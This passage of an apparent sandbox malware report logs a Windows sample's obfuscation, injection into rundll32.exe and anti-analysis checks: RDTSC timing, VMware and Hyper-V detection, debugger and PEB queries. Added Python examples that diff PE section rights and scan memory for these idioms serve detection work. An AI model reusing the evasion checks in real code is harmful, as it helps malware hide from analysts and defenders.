Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_1_0041B3C5 push eax; ret
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_1_004153FC push eax; retf
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_1_0041B47C push eax; ret
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_1_0041B412 push eax; ret
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_1_0041B41B push eax; ret
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_1_00415CE7 pushad ; ret
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_1_0041C4EE push 133511A3h; retf
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0460D0D1 push ecx; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_02C062F6 pushfd ; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_02C1B3C5 push eax; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_02C153FC push eax; retf
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_02C15CE7 pushad ; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_02C1C4EE push 133511A3h; retf
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_02C1B47C push eax; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_02C1B412 push eax; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_02C1B41B push eax; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_02C14D71 push ss; iretd
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_02C15D38 pushad ; ret
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe File created: C:\Users\user\AppData\Local\Temp\nsgB979.tmp\System.dll
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
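The "Detected unpacking" line above compares the section rights of the image dumped from 0x400000 with a second rights list, in a compact notation where each section is followed by E (execute), R (read) and W (write). The Python below is an added example, not code from the report or from the sample: it builds two constructed PE header skeletons, reads each section's Characteristics field, renders the rights in that same notation and lists sections that were added, removed or re-protected between the two. The section flags are assumptions chosen to reproduce a rights string like the report's; the .ndata section name it uses is the one NSIS installers carry, which fits the nsgB979.tmp\System.dll drop recorded above.

```python
import struct
from typing import List, Tuple

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_CNT_UNINITIALIZED_DATA = 0x00000080
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000

Rights = List[Tuple[str, str]]


def build_pe(sections: List[Tuple[str, int]]) -> bytes:
    """Constructed PE32 header skeleton: DOS stub, PE signature, COFF header,
    zeroed optional header and one 40-byte header per section. Only the
    fields the reader below needs are filled in; it is not a loadable file."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\x00" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    opt_size = 0xE0                                   # PE32 optional header
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x0102)
    opt = struct.pack("<H", 0x10B) + b"\x00" * (opt_size - 2)
    hdrs = b"".join(
        struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\x00"),
                    0, 0, 0, 0, 0, 0, 0, 0, chars)
        for name, chars in sections
    )
    return dos + b"PE\x00\x00" + coff + opt + hdrs


def section_rights(pe: bytes) -> Rights:
    """Read each section's Characteristics and render them as E/R/W letters."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("not a PE image")
    nsec = struct.unpack_from("<H", pe, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", pe, e_lfanew + 20)[0]
    off = e_lfanew + 24 + opt_size                    # first section header
    rights: Rights = []
    for _ in range(nsec):
        name = struct.unpack_from("<8s", pe, off)[0].rstrip(b"\x00").decode()
        chars = struct.unpack_from("<I", pe, off + 36)[0]
        flags = (("E" if chars & IMAGE_SCN_MEM_EXECUTE else "")
                 + ("R" if chars & IMAGE_SCN_MEM_READ else "")
                 + ("W" if chars & IMAGE_SCN_MEM_WRITE else ""))
        rights.append((name, flags))
        off += 40
    return rights


def rights_string(rights: Rights) -> str:
    """Same notation as the report line: .text:ER;.rdata:R;..."""
    return "".join(f"{name}:{flags};" for name, flags in rights)


def diff_rights(on_disk: Rights, in_memory: Rights):
    """Sections added, removed or re-protected between the file and the dump."""
    disk, mem = dict(on_disk), dict(in_memory)
    changes = []
    for name, flags in in_memory:
        if name not in disk:
            changes.append((name, "added", None, flags))
        elif disk[name] != flags:
            changes.append((name, "changed", disk[name], flags))
    for name, flags in on_disk:
        if name not in mem:
            changes.append((name, "removed", flags, None))
    return changes


# Constructed images. Section flags are assumptions, not read from the sample.
ON_DISK = build_pe([(".text", IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ)])
IN_MEMORY = build_pe([
    (".text", IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
    (".rdata", IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ),
    (".data", IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
    (".ndata", IMAGE_SCN_CNT_UNINITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
    (".rsrc", IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ),
])
# The classic in-place decryptor: .text made writable after load.
SELF_MODIFYING = build_pe([(".text", IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE
                            | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE)])

if __name__ == "__main__":
    print(rights_string(section_rights(IN_MEMORY)), "vs", rights_string(section_rights(ON_DISK)))
    for change in diff_rights(section_rights(ON_DISK), section_rights(IN_MEMORY)):
        print(change)
```

The third constructed image shows the other form this signature usually takes: the same section set, but .text gaining W because the stub decrypts the payload in place before jumping to it.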

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe RDTSC instruction interceptor: First address: 00000000004085F4 second address: 00000000004085FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe RDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe RDTSC instruction interceptor: First address: 0000000002C085F4 second address: 0000000002C085FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe RDTSC instruction interceptor: First address: 0000000002C0898E second address: 0000000002C08994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
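Three groups of evidence in this report are plain byte idioms that a memory scan can find without a disassembler: the push reg ; ret and pushfd/pushad ; ret sequences under Data Obfuscation, the rdtsc ; xor ecx, ecx ; add ecx, eax ; rdtsc pair the interceptor records above (the same code at 0x4085F4 in the sample and at 0x2C085F4 inside rundll32.exe, a 0x2800000 relocation of the injected image), and the mov eax/ecx, dword ptr fs:[30h] PEB reads listed further down. The Python below is an added example, not the sandbox's scanner or a rule from the report; it searches a memory image for those opcode patterns and returns their virtual addresses. The input bytes are constructed, and the mov al, [eax+2] that follows the PEB read is an assumed BeingDebugged fetch, not something the report shows.

```python
import re
from collections import Counter
from typing import Dict, List, Tuple

# 32-bit x86 byte patterns for the idioms listed in the report. Where an
# instruction has two common encodings both are accepted.
PATTERNS: Dict[str, re.Pattern] = {
    # rdtsc ; xor ecx,ecx ; add ecx,eax ; rdtsc  (the interceptor's sequence)
    "rdtsc timing pair": re.compile(
        rb"\x0f\x31(?:\x33\xc9|\x31\xc9)(?:\x03\xc8|\x01\xc1)\x0f\x31"
    ),
    # mov eax, dword ptr fs:[30h]   (TEB+0x30 holds the PEB pointer)
    "PEB read (eax)": re.compile(rb"\x64(?:\xa1|\x8b\x05)\x30\x00\x00\x00"),
    # mov ecx, dword ptr fs:[30h]
    "PEB read (ecx)": re.compile(rb"\x64\x8b\x0d\x30\x00\x00\x00"),
    # push r32 ; ret / pushfd ; ret / pushad ; ret  (push/ret control flow)
    "push/ret": re.compile(rb"(?:[\x50-\x57]|\x9c|\x60)\xc3"),
}


def scan(blob: bytes, base: int = 0) -> List[Tuple[int, str]]:
    """Return (virtual address, idiom) for every pattern hit, lowest first."""
    hits = []
    for label, pattern in PATTERNS.items():
        for m in pattern.finditer(blob):
            hits.append((base + m.start(), label))
    return sorted(hits)


def count_by_label(hits: List[Tuple[int, str]]) -> Dict[str, int]:
    """Per-idiom totals, the shape a triage summary would show."""
    return dict(Counter(label for _, label in hits))


# Constructed image (not bytes from the sample): NOP padding, the rdtsc pair
# exactly as the report lists it, a PEB read followed by an assumed
# BeingDebugged fetch, and a push eax ; ret gadget.
SAMPLE = (
    b"\x90" * 4
    + b"\x0f\x31\x33\xc9\x03\xc8\x0f\x31"  # +4  rdtsc; xor ecx,ecx; add ecx,eax; rdtsc
    + b"\x2b\xc1"                          # +12 sub eax, ecx   (elapsed cycles)
    + b"\x64\xa1\x30\x00\x00\x00"          # +14 mov eax, fs:[30h]
    + b"\x8a\x40\x02"                      # +20 mov al, [eax+2]  PEB.BeingDebugged (assumed)
    + b"\x50\xc3"                          # +23 push eax ; ret
)

if __name__ == "__main__":
    for addr, label in scan(SAMPLE, base=0x400000):
        print(f"{addr:08X}  {label}")
```

The push/ret pattern matches two-byte gadgets, so on a real dump it will also hit ordinary function epilogues; treat its count as a hint to look at, not a verdict, and weight the rdtsc pair and PEB reads higher.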
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_004088C0 rdtsc
Source: C:\Windows\explorer.exe TID: 6540 Thread sleep time: -50000s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 0_2_00405E93 FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 0_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 0_2_00402671 FindFirstFileA,
Source: explorer.exe, 00000003.00000000.352759648.0000000008430000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000003.00000000.352726758.00000000083EB000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000003.00000000.348164098.0000000005D50000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000003.00000000.349159526.00000000063F6000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000000.352726758.00000000083EB000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000003.00000000.353071310.0000000008540000.00000004.00000001.sdmp Binary or memory string: E#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA-
Source: explorer.exe, 00000003.00000000.349159526.00000000063F6000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000000.353264391.0000000008674000.00000004.00000001.sdmp Binary or memory string: 00#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&-
Source: explorer.exe, 00000003.00000000.352620265.00000000082E2000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: explorer.exe, 00000003.00000000.348164098.0000000005D50000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000003.00000000.348164098.0000000005D50000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000003.00000000.352620265.00000000082E2000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000003.00000000.352759648.0000000008430000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
Source: explorer.exe, 00000003.00000000.348164098.0000000005D50000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: explorer.exe, 00000003.00000000.337441844.000000000095C000.00000004.00000020.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_004088C0 rdtsc
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00409B30 LdrLoadDll,
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 0_2_10001D3B GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,lstrcatA,GetProcAddress,
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A320A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A320A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A320A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A320A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A320A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A320A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A490AF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A3F0BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A3F0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A3F0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A09080 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A83884 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A83884 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A058EC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A9B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A9B8D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A9B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A9B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A9B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A9B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A1B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A1B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A1B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A1B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A3002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A3002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A3002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A3002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A3002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00AD4015 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00AD4015 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A87016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A87016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A87016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00AD1074 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00AC2073 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A20050 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A20050 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A361A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A361A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A869A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A851BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A851BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A851BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A851BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A2C182 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A3A185 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A32990 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A0B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A0B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A0B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A941E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A24120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A24120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A24120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A24120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A24120 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A3513A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A3513A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A09100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A09100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A09100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A0C962 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A0B171 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A0B171 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A2B944 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A2B944 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A052A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A052A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A052A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A052A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A052A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A1AAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A1AAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A3FAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A3D294 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A3D294 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A32AE4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A32ACB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A44A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A44A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A18A0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A05210 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A05210 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A05210 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A05210 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A0AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A0AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00ACAA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00ACAA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A23A1C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00ABB260 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00ABB260 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00AD8A62 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A4927A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A09240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A09240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A09240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A09240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00ACEA55 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A94257 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00AD5BA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A34BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A34BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A34BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00AC138A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00ABD380 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A11B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A11B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A3B390 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A32397 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A303E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A303E2 mov eax, dword ptr fs:[00000030h]
